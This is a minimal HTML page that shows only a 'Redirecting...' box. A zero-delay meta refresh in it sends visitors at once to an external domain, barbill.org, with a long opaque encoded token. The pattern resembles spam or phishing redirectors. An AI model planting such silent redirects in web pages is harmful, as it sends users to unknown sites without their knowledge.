<!DOCTYPE html>
<html lang="en">
<head>
  <meta http-equiv="refresh" content="0;URL=http://barbill.org/qs=op-achkdfcacagffbkfdacagefbiababacaidadhaccaejjhaebcfaehhgckacb"/>
  <style>
    body {
      font-family: Arial, sans-serif;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      background-color: #f0f0f0;
    }

    .notification {
      padding: 20px;
      background-color: #333;
      color: #fff;
      border-radius: 8px;
      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
      text-align: center;
      font-size: 16px;
      max-width: 400px;
      margin: auto;
    }

    .notification p {
      margin: 0;
      font-size: 18px;
      font-weight: bold;
    }
  </style>
</head>
<body>
  <div class="notification">
    <p>Redirecting...</p>
  </div>
</body>
</html>